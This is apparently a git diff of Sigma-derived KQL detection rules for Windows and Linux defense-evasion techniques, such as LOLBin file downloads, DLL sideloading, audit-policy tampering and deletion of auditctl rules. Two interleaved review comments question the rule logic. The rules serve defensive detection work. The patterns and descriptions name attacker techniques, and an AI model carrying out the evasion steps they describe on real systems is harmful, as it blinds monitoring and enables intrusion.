+// Title: Antivirus Filter Driver Disallowed On Dev Drive - Registry
+// Author: @kostastsale, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-11-05
+// Level: high
+// Description: Detects activity that indicates a user disabling the ability for Antivirus mini filter to inspect a "Dev Drive".
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
 | where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "\\FilterManager\\FltmgrDevDriveAllowAntivirusFilter"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/arbitrary_dll_or_csproj_code_execution_via_dotnet_exe.kql b/KQL/rules/Defense Evasion/arbitrary_dll_or_csproj_code_execution_via_dotnet_exe.kql
index 5492f416..e5e3794a 100644
--- a/KQL/rules/Defense Evasion/arbitrary_dll_or_csproj_code_execution_via_dotnet_exe.kql
+++ b/KQL/rules/Defense Evasion/arbitrary_dll_or_csproj_code_execution_via_dotnet_exe.kql
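Review bot: `RegistryValueData =~ "DWORD (0x00000000)"` on the `| where` context line matches the Sysmon Event ID 13 rendering of a DWORD, not the Defender for Endpoint one; as far as I recall the schema, RegistryValueData in DeviceRegistryEvents carries the plain value (a DWORD zero appears as `0`), so this high-severity rule would never fire on the table it targets. A value test in the target schema's form, for example `RegistryValueData == "0"`, or simply dropping the value test and alerting on any write to the key, is worth confirming against live data before relying on it. The key is `FltmgrDevDriveAllowAntivirusFilter`, not a path under the key, so `RegistryKey endswith` is matching on the value name's parent; if the converter maps Sigma `TargetObject` wholesale to RegistryKey, the value name may actually land in RegistryValueName and this half should be checked as well.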
@@ -1,12 +1,12 @@
-// Title: Arbitrary DLL or Csproj Code Execution Via Dotnet.EXE
-// Author: Beyu Denis, oscd.community
-// Date: 2020-10-18
-// Level: medium
-// Description: Detects execution of arbitrary DLLs or unsigned code via a ".csproj" files via Dotnet.EXE.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218
-// False Positives:
-// - Legitimate administrator usage
-
-DeviceProcessEvents
+// Title: Arbitrary DLL or Csproj Code Execution Via Dotnet.EXE
+// Author: Beyu Denis, oscd.community
+// Date: 2020-10-18
+// Level: medium
+// Description: Detects execution of arbitrary DLLs or unsigned code via a ".csproj" files via Dotnet.EXE.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - Legitimate administrator usage
+
+DeviceProcessEvents
 | where ((ProcessCommandLine endswith ".csproj" or ProcessCommandLine endswith ".csproj\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".csproj'" or ProcessCommandLine endswith ".dll'") and (FolderPath endswith "\\dotnet.exe" or ProcessVersionInfoOriginalFileName =~ ".NET Host")) and (not(((ProcessCommandLine contains "C:\\ProgramData\\CSScriptNpp\\" and ProcessCommandLine contains "-cscs_path:" and ProcessCommandLine contains "\\cs-script\\cscs.dll") and (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Notepad++\\notepad++.exe", "C:\\Program Files\\Notepad++\\notepad++.exe")))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/arbitrary_file_download_via_imewdbld_exe.kql b/KQL/rules/Defense Evasion/arbitrary_file_download_via_imewdbld_exe.kql
index 7ad1a4e9..9f47fb3a 100644
--- a/KQL/rules/Defense Evasion/arbitrary_file_download_via_imewdbld_exe.kql
+++ b/KQL/rules/Defense Evasion/arbitrary_file_download_via_imewdbld_exe.kql
@@ -1,10 +1,10 @@
-// Title: Arbitrary File Download Via IMEWDBLD.EXE
-// Author: Swachchhanda Shrawan Poudel
-// Date: 2023-11-09
-// Level: high
-// Description: Detects usage of "IMEWDBLD.exe" to download arbitrary files
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.execution, attack.t1218
-
-DeviceProcessEvents
+// Title: Arbitrary File Download Via IMEWDBLD.EXE
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2023-11-09
+// Level: high
+// Description: Detects usage of "IMEWDBLD.exe" to download arbitrary files
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\IMEWDBLD.exe" or ProcessVersionInfoOriginalFileName =~ "imewdbld.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/arbitrary_file_download_via_msedge_proxy_exe.kql b/KQL/rules/Defense Evasion/arbitrary_file_download_via_msedge_proxy_exe.kql
index d60733b3..24155d2f 100644
--- a/KQL/rules/Defense Evasion/arbitrary_file_download_via_msedge_proxy_exe.kql
+++ b/KQL/rules/Defense Evasion/arbitrary_file_download_via_msedge_proxy_exe.kql
@@ -1,10 +1,10 @@
-// Title: Arbitrary File Download Via MSEDGE_PROXY.EXE
-// Author: Swachchhanda Shrawan Poudel
-// Date: 2023-11-09
-// Level: medium
-// Description: Detects usage of "msedge_proxy.exe" to download arbitrary files
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.execution, attack.t1218
-
-DeviceProcessEvents
+// Title: Arbitrary File Download Via MSEDGE_PROXY.EXE
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2023-11-09
+// Level: medium
+// Description: Detects usage of "msedge_proxy.exe" to download arbitrary files
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\msedge_proxy.exe" or ProcessVersionInfoOriginalFileName =~ "msedge_proxy.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/arbitrary_file_download_via_msohtmed_exe.kql b/KQL/rules/Defense Evasion/arbitrary_file_download_via_msohtmed_exe.kql
index 13bfc92f..52743a07 100644
--- a/KQL/rules/Defense Evasion/arbitrary_file_download_via_msohtmed_exe.kql
+++ b/KQL/rules/Defense Evasion/arbitrary_file_download_via_msohtmed_exe.kql
@@ -1,10 +1,10 @@
-// Title: Arbitrary File Download Via MSOHTMED.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-08-19
-// Level: medium
-// Description: Detects usage of "MSOHTMED" to download arbitrary files
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.execution, attack.t1218
-
-DeviceProcessEvents
+// Title: Arbitrary File Download Via MSOHTMED.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-19
+// Level: medium
+// Description: Detects usage of "MSOHTMED" to download arbitrary files
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "ftp://" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\MSOHTMED.exe" or ProcessVersionInfoOriginalFileName =~ "MsoHtmEd.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/arbitrary_file_download_via_mspub_exe.kql b/KQL/rules/Defense Evasion/arbitrary_file_download_via_mspub_exe.kql
index 0c4f3350..02fb0133 100644
--- a/KQL/rules/Defense Evasion/arbitrary_file_download_via_mspub_exe.kql
+++ b/KQL/rules/Defense Evasion/arbitrary_file_download_via_mspub_exe.kql
@@ -1,10 +1,10 @@
-// Title: Arbitrary File Download Via MSPUB.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-08-19
-// Level: medium
-// Description: Detects usage of "MSPUB" (Microsoft Publisher) to download arbitrary files
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.execution, attack.t1218
-
-DeviceProcessEvents
+// Title: Arbitrary File Download Via MSPUB.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-19
+// Level: medium
+// Description: Detects usage of "MSPUB" (Microsoft Publisher) to download arbitrary files
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "ftp://" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\MSPUB.exe" or ProcessVersionInfoOriginalFileName =~ "MSPUB.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/arbitrary_file_download_via_presentationhost_exe.kql b/KQL/rules/Defense Evasion/arbitrary_file_download_via_presentationhost_exe.kql
index bf1c0eb9..6c3ffac9 100644
--- a/KQL/rules/Defense Evasion/arbitrary_file_download_via_presentationhost_exe.kql
+++ b/KQL/rules/Defense Evasion/arbitrary_file_download_via_presentationhost_exe.kql
@@ -1,10 +1,10 @@ -// Title: Arbitrary File Download Via PresentationHost.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-08-19 -// Level: medium -// Description: Detects usage of "PresentationHost" which is a utility that runs ".xbap" (Browser Applications) files to download arbitrary files -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution, attack.t1218 - -DeviceProcessEvents +// Title: Arbitrary File Download Via PresentationHost.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-19 +// Level: medium +// Description: Detects usage of "PresentationHost" which is a utility that runs ".xbap" (Browser Applications) files to download arbitrary files +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1218 + +DeviceProcessEvents | where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://" or ProcessCommandLine contains "ftp://") and (FolderPath endswith "\\presentationhost.exe" or ProcessVersionInfoOriginalFileName =~ "PresentationHost.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/arbitrary_file_download_via_squirrel_exe.kql b/KQL/rules/Defense Evasion/arbitrary_file_download_via_squirrel_exe.kql index 8730c452..a9df2741 100644 --- a/KQL/rules/Defense Evasion/arbitrary_file_download_via_squirrel_exe.kql +++ b/KQL/rules/Defense Evasion/arbitrary_file_download_via_squirrel_exe.kql 
@@ -1,12 +1,12 @@ -// Title: Arbitrary File Download Via Squirrel.EXE -// Author: Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community -// Date: 2022-06-09 -// Level: medium -// Description: Detects the usage of the "Squirrel.exe" to download arbitrary files. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.) -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution, attack.t1218 -// False Positives: -// - Expected FP with some Electron based applications such as (1Clipboard, Beaker Browser, Caret, Discord, GitHub Desktop, etc.) - -DeviceProcessEvents +// Title: Arbitrary File Download Via Squirrel.EXE +// Author: Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community +// Date: 2022-06-09 +// Level: medium +// Description: Detects the usage of the "Squirrel.exe" to download arbitrary files. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1218 +// False Positives: +// - Expected FP with some Electron based applications such as (1Clipboard, Beaker Browser, Caret, Discord, GitHub Desktop, etc.) + +DeviceProcessEvents | where (ProcessCommandLine contains " --download " or ProcessCommandLine contains " --update " or ProcessCommandLine contains " --updateRollback=") and ProcessCommandLine contains "http" and (FolderPath endswith "\\squirrel.exe" or FolderPath endswith "\\update.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/aruba_network_service_potential_dll_sideloading.kql b/KQL/rules/Defense Evasion/aruba_network_service_potential_dll_sideloading.kql index 0674ea72..b905f641 100644 --- a/KQL/rules/Defense Evasion/aruba_network_service_potential_dll_sideloading.kql 
+++ b/KQL/rules/Defense Evasion/aruba_network_service_potential_dll_sideloading.kql @@ -1,10 +1,10 @@ -// Title: Aruba Network Service Potential DLL Sideloading -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-01-22 -// Level: high -// Description: Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access "arubanetsvc.exe" process using DLL Search Order Hijacking -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation, attack.persistence, attack.t1574.001 - -DeviceImageLoadEvents +// Title: Aruba Network Service Potential DLL Sideloading +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-22 +// Level: high +// Description: Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access "arubanetsvc.exe" process using DLL Search Order Hijacking +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.persistence, attack.t1574.001 + +DeviceImageLoadEvents | where ((FolderPath endswith "\\wtsapi32.dll" or FolderPath endswith "\\msvcr100.dll" or FolderPath endswith "\\msvcp100.dll" or FolderPath endswith "\\dbghelp.dll" or FolderPath endswith "\\dbgcore.dll" or FolderPath endswith "\\wininet.dll" or FolderPath endswith "\\iphlpapi.dll" or FolderPath endswith "\\version.dll" or FolderPath endswith "\\cryptsp.dll" or FolderPath endswith "\\cryptbase.dll" or FolderPath endswith "\\wldp.dll" or FolderPath endswith "\\profapi.dll" or FolderPath endswith "\\sspicli.dll" or FolderPath endswith "\\winsta.dll" or FolderPath endswith "\\dpapi.dll") and InitiatingProcessFolderPath endswith "\\arubanetsvc.exe") and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) \ No newline at end of file 
diff --git a/KQL/rules/Defense Evasion/aspnetcompiler_execution.kql b/KQL/rules/Defense Evasion/aspnetcompiler_execution.kql index 65278ddd..ac55367d 100644 --- a/KQL/rules/Defense Evasion/aspnetcompiler_execution.kql +++ b/KQL/rules/Defense Evasion/aspnetcompiler_execution.kql @@ -1,10 +1,10 @@ -// Title: AspNetCompiler Execution -// Author: frack113 -// Date: 2021-11-24 -// Level: medium -// Description: Detects execution of "aspnet_compiler.exe" which can be abused to compile and execute C# code. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1127 - -DeviceProcessEvents +// Title: AspNetCompiler Execution +// Author: frack113 +// Date: 2021-11-24 +// Level: medium +// Description: Detects execution of "aspnet_compiler.exe" which can be abused to compile and execute C# code. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1127 + +DeviceProcessEvents | where (FolderPath contains ":\\Windows\\Microsoft.NET\\Framework\\" or FolderPath contains ":\\Windows\\Microsoft.NET\\Framework64\\" or FolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm\\" or FolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm64\\") and FolderPath endswith "\\aspnet_compiler.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/assembly_loading_via_cl_loadassembly_ps1.kql b/KQL/rules/Defense Evasion/assembly_loading_via_cl_loadassembly_ps1.kql index 52d6cf47..981daf77 100644 --- a/KQL/rules/Defense Evasion/assembly_loading_via_cl_loadassembly_ps1.kql +++ b/KQL/rules/Defense Evasion/assembly_loading_via_cl_loadassembly_ps1.kql 
@@ -1,10 +1,10 @@ -// Title: Assembly Loading Via CL_LoadAssembly.ps1 -// Author: frack113, Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-05-21 -// Level: medium -// Description: Detects calls to "LoadAssemblyFromPath" or "LoadAssemblyFromNS" that are part of the "CL_LoadAssembly.ps1" script. This can be abused to load different assemblies and bypass App locker controls. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1216 - -DeviceProcessEvents +// Title: Assembly Loading Via CL_LoadAssembly.ps1 +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-05-21 +// Level: medium +// Description: Detects calls to "LoadAssemblyFromPath" or "LoadAssemblyFromNS" that are part of the "CL_LoadAssembly.ps1" script. This can be abused to load different assemblies and bypass App locker controls. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1216 + +DeviceProcessEvents | where ProcessCommandLine contains "LoadAssemblyFromPath " or ProcessCommandLine contains "LoadAssemblyFromNS " \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/audit_policy_tampering_via_auditpol.kql b/KQL/rules/Defense Evasion/audit_policy_tampering_via_auditpol.kql index 4fc52334..2928004b 100644 --- a/KQL/rules/Defense Evasion/audit_policy_tampering_via_auditpol.kql +++ b/KQL/rules/Defense Evasion/audit_policy_tampering_via_auditpol.kql 
@@ -1,13 +1,13 @@ -// Title: Audit Policy Tampering Via Auditpol -// Author: Janantha Marasinghe (https://github.com/blueteam0ps) -// Date: 2021-02-02 -// Level: high -// Description: Threat actors can use auditpol binary to change audit policy configuration to impair detection capability. -// This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.002 -// False Positives: -// - Administrator or administrator scripts might leverage the flags mentioned in the detection section. Either way, it should always be monitored - -DeviceProcessEvents +// Title: Audit Policy Tampering Via Auditpol +// Author: Janantha Marasinghe (https://github.com/blueteam0ps) +// Date: 2021-02-02 +// Level: high +// Description: Threat actors can use auditpol binary to change audit policy configuration to impair detection capability. +// This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.002 +// False Positives: +// - Administrator or administrator scripts might leverage the flags mentioned in the detection section. Either way, it should always be monitored + +DeviceProcessEvents | where (ProcessCommandLine contains "disable" or ProcessCommandLine contains "clear" or ProcessCommandLine contains "remove" or ProcessCommandLine contains "restore") and (FolderPath endswith "\\auditpol.exe" or ProcessVersionInfoOriginalFileName =~ "AUDITPOL.EXE") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/audit_policy_tampering_via_nt_resource_kit_auditpol.kql b/KQL/rules/Defense Evasion/audit_policy_tampering_via_nt_resource_kit_auditpol.kql index c0c1dfd3..75a6e4f2 100644 
--- a/KQL/rules/Defense Evasion/audit_policy_tampering_via_nt_resource_kit_auditpol.kql +++ b/KQL/rules/Defense Evasion/audit_policy_tampering_via_nt_resource_kit_auditpol.kql 
@@ -1,13 +1,13 @@ -// Title: Audit Policy Tampering Via NT Resource Kit Auditpol -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2021-12-18 -// Level: high -// Description: Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability. -// This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.002 -// False Positives: -// - The old auditpol utility isn't available by default on recent versions of Windows as it was replaced by a newer version. The FP rate should be very low except for tools that use a similar flag structure - -DeviceProcessEvents +// Title: Audit Policy Tampering Via NT Resource Kit Auditpol +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-12-18 +// Level: high +// Description: Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability. +// This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.002 +// False Positives: +// - The old auditpol utility isn't available by default on recent versions of Windows as it was replaced by a newer version. 
The FP rate should be very low except for tools that use a similar flag structure + +DeviceProcessEvents | where ProcessCommandLine contains "/logon:none" or ProcessCommandLine contains "/system:none" or ProcessCommandLine contains "/sam:none" or ProcessCommandLine contains "/privilege:none" or ProcessCommandLine contains "/object:none" or ProcessCommandLine contains "/process:none" or ProcessCommandLine contains "/policy:none" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/audit_rules_deleted_via_auditctl.kql b/KQL/rules/Defense Evasion/audit_rules_deleted_via_auditctl.kql index 0cfe2afe..09580819 100644 --- a/KQL/rules/Defense Evasion/audit_rules_deleted_via_auditctl.kql +++ b/KQL/rules/Defense Evasion/audit_rules_deleted_via_auditctl.kql 
@@ -1,14 +1,14 @@
-// Title: Audit Rules Deleted Via Auditctl
-// Author: Mohamed LAKRI
-// Date: 2025-10-17
-// Level: high
-// Description: Detects the execution of 'auditctl' with the '-D' command line parameter, which deletes all configured audit rules and watches on Linux systems.
-// This technique is commonly used by attackers to disable audit logging and cover their tracks by removing monitoring capabilities.
-// Removal of audit rules can significantly impair detection of malicious activities on the affected system.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.012
-// False Positives:
-// - An administrator troubleshooting. Investigate all attempts.
-
-DeviceProcessEvents
+// Title: Audit Rules Deleted Via Auditctl
+// Author: Mohamed LAKRI
+// Date: 2025-10-17
+// Level: high
+// Description: Detects the execution of 'auditctl' with the '-D' command line parameter, which deletes all configured audit rules and watches on Linux systems.
+// This technique is commonly used by attackers to disable audit logging and cover their tracks by removing monitoring capabilities.
+// Removal of audit rules can significantly impair detection of malicious activities on the affected system.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.012
+// False Positives:
+// - An administrator troubleshooting. Investigate all attempts.
+
+DeviceProcessEvents
 | where ProcessCommandLine matches regex "-D" and FolderPath endswith "/auditctl"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl.kql b/KQL/rules/Defense Evasion/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl.kql
index 08ca00c1..39c09b7d 100644
--- a/KQL/rules/Defense Evasion/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl.kql
+++ b/KQL/rules/Defense Evasion/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl.kql
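Review bot: The `| where ProcessCommandLine matches regex "-D"` predicate on the context line is an unanchored regex, so it fires on any auditctl invocation whose command line merely contains the two characters `-D` anywhere — for example a `-k` key name such as `conf-Delete` — rather than the standalone `-D` flag the description says the rule is about. Anchoring it to a whitespace-delimited flag, `ProcessCommandLine matches regex @"(^|\s)-D(\s|$)" and FolderPath endswith "/auditctl"`, keeps the detection but removes that false-positive path. If the converter emitted this from a plain Sigma `CommandLine|re` modifier, the same unanchored pattern will presumably appear in other regenerated rules and is worth checking there too.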
@@ -1,12 +1,12 @@ -// Title: AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl -// Author: Julia Fomina, oscd.community -// Date: 2020-10-06 -// Level: medium -// Description: Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed) -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1216 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl +// Author: Julia Fomina, oscd.community +// Date: 2020-10-06 +// Level: medium +// Description: Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1216 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ProcessCommandLine contains "winrm" and ((ProcessCommandLine contains "format:pretty" or ProcessCommandLine contains "format:\"pretty\"" or ProcessCommandLine contains "format:\"text\"" or ProcessCommandLine contains "format:text") and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl_file.kql b/KQL/rules/Defense Evasion/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl_file.kql index 9c6576c2..60d24e33 100644 --- a/KQL/rules/Defense Evasion/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl_file.kql +++ b/KQL/rules/Defense Evasion/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl_file.kql 
@@ -1,12 +1,12 @@ -// Title: AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File -// Author: Julia Fomina, oscd.community -// Date: 2020-10-06 -// Level: medium -// Description: Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed) -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1216 -// False Positives: -// - Unlikely - -DeviceFileEvents +// Title: AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File +// Author: Julia Fomina, oscd.community +// Date: 2020-10-06 +// Level: medium +// Description: Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1216 +// False Positives: +// - Unlikely + +DeviceFileEvents | where (FolderPath endswith "WsmPty.xsl" or FolderPath endswith "WsmTxt.xsl") and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/baaupdate_exe_suspicious_dll_load.kql b/KQL/rules/Defense Evasion/baaupdate_exe_suspicious_dll_load.kql index 58287020..33fcffde 100644 --- a/KQL/rules/Defense Evasion/baaupdate_exe_suspicious_dll_load.kql +++ b/KQL/rules/Defense Evasion/baaupdate_exe_suspicious_dll_load.kql 
@@ -1,12 +1,12 @@ -// Title: BaaUpdate.exe Suspicious DLL Load -// Author: Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2025-10-18 -// Level: high -// Description: Detects BitLocker Access Agent Update Utility (baaupdate.exe) loading DLLs from suspicious locations that are publicly writable which could indicate an attempt to lateral movement via BitLocker DCOM & COM Hijacking. -// This technique abuses COM Classes configured as INTERACTIVE USER to spawn processes in the context of the logged-on user's session. Specifically, it targets the BDEUILauncher Class (CLSID ab93b6f1-be76-4185-a488-a9001b105b94) -// which can launch BaaUpdate.exe, which is vulnerable to COM Hijacking when started with input parameters. This allows attackers to execute code in the user's context without needing to steal credentials or use additional techniques to compromise the account. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218, attack.lateral-movement, attack.t1021.003 - -DeviceImageLoadEvents +// Title: BaaUpdate.exe Suspicious DLL Load +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-10-18 +// Level: high +// Description: Detects BitLocker Access Agent Update Utility (baaupdate.exe) loading DLLs from suspicious locations that are publicly writable which could indicate an attempt to lateral movement via BitLocker DCOM & COM Hijacking. +// This technique abuses COM Classes configured as INTERACTIVE USER to spawn processes in the context of the logged-on user's session. Specifically, it targets the BDEUILauncher Class (CLSID ab93b6f1-be76-4185-a488-a9001b105b94) +// which can launch BaaUpdate.exe, which is vulnerable to COM Hijacking when started with input parameters. This allows attackers to execute code in the user's context without needing to steal credentials or use additional techniques to compromise the account. 
+// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218, attack.lateral-movement, attack.t1021.003 + +DeviceImageLoadEvents | where (FolderPath contains ":\\Perflogs\\" or FolderPath contains ":\\Users\\Default\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains ":\\Windows\\Temp\\" or FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\AppData\\Roaming\\" or FolderPath contains "\\Contacts\\" or FolderPath contains "\\Favorites\\" or FolderPath contains "\\Favourites\\" or FolderPath contains "\\Links\\" or FolderPath contains "\\Music\\" or FolderPath contains "\\Pictures\\" or FolderPath contains "\\ProgramData\\" or FolderPath contains "\\Temporary Internet" or FolderPath contains "\\Videos\\") and FolderPath endswith ".dll" and InitiatingProcessFolderPath endswith "\\BaaUpdate.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/bad_opsec_defaults_sacrificial_processes_with_improper_arguments.kql b/KQL/rules/Defense Evasion/bad_opsec_defaults_sacrificial_processes_with_improper_arguments.kql index f69d45f0..f158ee74 100644 --- a/KQL/rules/Defense Evasion/bad_opsec_defaults_sacrificial_processes_with_improper_arguments.kql +++ b/KQL/rules/Defense Evasion/bad_opsec_defaults_sacrificial_processes_with_improper_arguments.kql 
@@ -1,14 +1,14 @@ -// Title: Bad Opsec Defaults Sacrificial Processes With Improper Arguments -// Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems) -// Date: 2020-10-23 -// Level: high -// Description: Detects attackers using tooling with bad opsec defaults. -// E.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run. -// One trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.011 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Bad Opsec Defaults Sacrificial Processes With Improper Arguments +// Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems) +// Date: 2020-10-23 +// Level: high +// Description: Detects attackers using tooling with bad opsec defaults. +// E.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run. +// One trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples. 
